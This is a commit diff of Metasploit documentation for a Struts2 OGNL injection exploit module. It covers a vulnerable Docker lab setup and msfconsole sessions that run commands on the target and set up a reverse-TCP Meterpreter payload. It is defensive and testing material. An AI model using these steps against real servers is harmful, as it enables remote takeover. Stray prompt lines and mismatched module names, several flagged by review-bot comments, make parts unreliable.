Reformat the struts2_namespace_ognl module docs
zeroSteiner committed Dec 15, 2020
1 parent fc70173 commit 246c455
Showing 1 changed file with 98 additions and 86 deletions.
184 changes: 98 additions & 86 deletions documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
Expand Up @@ -10,90 +10,102 @@ As a result of the lack of OGNL output, we currently cannot support large payloa

## Vulnerable Application

The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:

1. From a stock Ubuntu VM, install docker:
```
sudo apt update && sudo apt install docker.io
```

2. Download a vulnerable Struts showcase application inside a docker container:
```
sudo docker pull piesecurity/apache-struts2-cve-2017-5638
sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CONTAINER_ID=`sudo docker ps -l -q`
```

3. Now that the container is running, open a terminal inside of it:
```
sudo docker exec -it $CONTAINER_ID /bin/bash
```

4. From within the container, install your text editor of choice and modify the Struts configs:
```
sudo apt update && sudo apt install nano
nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```

5. Update the struts config to add this to above line #11:
```
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
```

6. Update the same struts config file to add this above line #78:
```
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
```

7. Still within the container, shutdown the environment:
```
/usr/local/tomcat/bin/shutdown.sh
```

8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:

1. From a stock Ubuntu VM, install docker:

```
sudo apt update && sudo apt install docker.io
```

2. Download a vulnerable Struts showcase application inside a docker container:

```
sudo docker pull piesecurity/apache-struts2-cve-2017-5638
sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CONTAINER_ID=`sudo docker ps -l -q`
```

3. Now that the container is running, open a terminal inside of it:

```
sudo docker exec -it $CONTAINER_ID /bin/bash
```

4. From within the container, install your text editor of choice and modify the Struts configs:

```
sudo apt update && sudo apt install nano
nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```

5. Update the struts config to add this to above line #11:

```
&lt;constant name=&quot;struts.mapper.alwaysSelectFullNamespace&quot; value=&quot;true&quot; /&gt;
```

6. Update the same struts config file to add this above line #78:

```
&lt;action name=&quot;help&quot;&gt;
&lt;result type=&quot;redirectAction&quot;&gt;
&lt;param name=&quot;actionName&quot;&gt;date.action&lt;/param&gt;
&lt;/result&gt;
&lt;/action&gt;
```

7. Still within the container, shutdown the environment:

```
/usr/local/tomcat/bin/shutdown.sh
```

8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
```
sudo docker start $CONTAINER_ID
```

Congratulations. You now have a vulnerable Struts server. If you're following these instructions, your server should be listening on 0.0.0.0:32771. To confirm:
```
INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
```

```
sudo docker start $CONTAINER_ID
```

Congratulations. You now have a vulnerable Struts server. If you're following these instructions, your server should be listening on 0.0.0.0:32771. To confirm:

```
INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
```

## Verification Steps

Confirm that check functionality works:

- [ ] Install the application using the steps above.
- [ ] Start msfconsole.
- [ ] Load the module: ```use exploit/multi/http/struts_namespace_ognl```
- [ ] Load the module: `use exploit/multi/http/struts_namespace_ognl`
- [ ] Set the RHOST.
- [ ] Set an invalid ACTION: ```set ACTION wrong.action```
- [ ] Confirm the target is *not* vulnerable: ```check```
- [ ] Observe that the target is *not* vulnerable: ```The target is not exploitable.```
- [ ] Set a valid ACTION: ```set ACTION help.action```
- [ ] Confirm that the target is vulnerable: ```The target is vulnerable.```
- [ ] Set an invalid ACTION: `set ACTION wrong.action`
- [ ] Confirm the target is *not* vulnerable: `check`
- [ ] Observe that the target is *not* vulnerable: `The target is not exploitable.`
- [ ] Set a valid ACTION: `set ACTION help.action`
- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`

Confirm that command execution functionality works:
- [ ] Set a payload: ```set PAYLOAD cmd/unix/generic```
- [ ] Set a command to be run: ```set CMD hostname```
- [ ] Run the exploit: ```run```
- [ ] Confirm the output is the container ID of your docker environment, e.g: ```b3d9b350d9b6```

- [ ] Set a payload: `set PAYLOAD cmd/unix/generic`
- [ ] Set a command to be run: `set CMD hostname`
- [ ] Run the exploit: `run`
- [ ] Confirm the output is the container ID of your docker environment, e.g: `b3d9b350d9b6`
- [ ] You will not be given a shell (yet).

Confirm that payload upload and execution works:
- [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp```

- [ ] Set a payload, e.g.: `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
- [ ] Configure `LHOST` and `RHOST` as necessary.
- [ ] Run the exploit: ```run```
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
- [ ] Run the exploit: `run`

## Options

**TARGETURI**
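Review bot: the struts.xml snippets in steps 5 and 6 now appear as HTML entities (`&lt;constant name=&quot;struts.mapper.alwaysSelectFullNamespace&quot; value=&quot;true&quot; /&gt;`) where the old lines had the raw XML; inside a Markdown fenced block no escaping is needed, and a reader who copies the block into struts.xml as shown gets entity text instead of an XML element, so keep the raw `<constant ... />` and `<action name="help">` lines unless the docs renderer is known to require entities. While these lines are being touched, "reliabliy" and "exerpts" in the intro paragraph are still misspelled, the step `use exploit/multi/http/struts_namespace_ognl` does not match the module name `struts2_namespace_ognl` used in the file path and in the prompt `msf5 exploit(multi/http/struts2_namespace_ognl) >` shown on this page, and "Set the RHOST." should name the option as it is actually set later in the doc (`set RHOSTS`).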
Expand All @@ -108,23 +120,23 @@ msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134

### Version of software and OS as applicable

Checking a vulnerable endpoint, as installed in the above steps:
Checking a vulnerable endpoint, as installed in the above steps:

```
msf > use exploit/multi/http/struts_namespace_ognl
msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
ACTION => help.action
msf5 exploit(multi/http/struts_namespace_ognl) > check
[+] 192.168.199.135:32771 The target is vulnerable.
```
```
msf > use exploit/multi/http/struts_namespace_ognl
msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
ACTION => help.action
msf5 exploit(multi/http/struts_namespace_ognl) > check
[+] 192.168.199.135:32771 The target is vulnerable.
```

Running an arbitrary command on the above-described environment:
Running an arbitrary command on the above-described environment:

```
msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
```
msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname
CMD => hostname
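Review bot: the transcript is inconsistent in a way the re-indent does not address: the first prompt is `msf >` while every later one is `msf5 exploit(multi/http/struts_namespace_ognl) >`, and `set RHOSTS 192.168.199.135` / `set RPORT 32771` show no `RHOSTS => ...` / `RPORT => ...` echo although `set ACTION help.action` is followed by `ACTION => help.action`; since the block is presented as captured output, either paste a complete real session or trim every `set` line to the same style. The `use` line here carries the same `struts_namespace_ognl` vs `struts2_namespace_ognl` naming mismatch as the verification steps.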
Expand All @@ -136,9 +148,9 @@ b3d9b350d9b6
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/struts_namespace_ognl) >
```
```

Getting a Meterpreter session on the above-described environment:
Getting a Meterpreter session on the above-described environment:

```
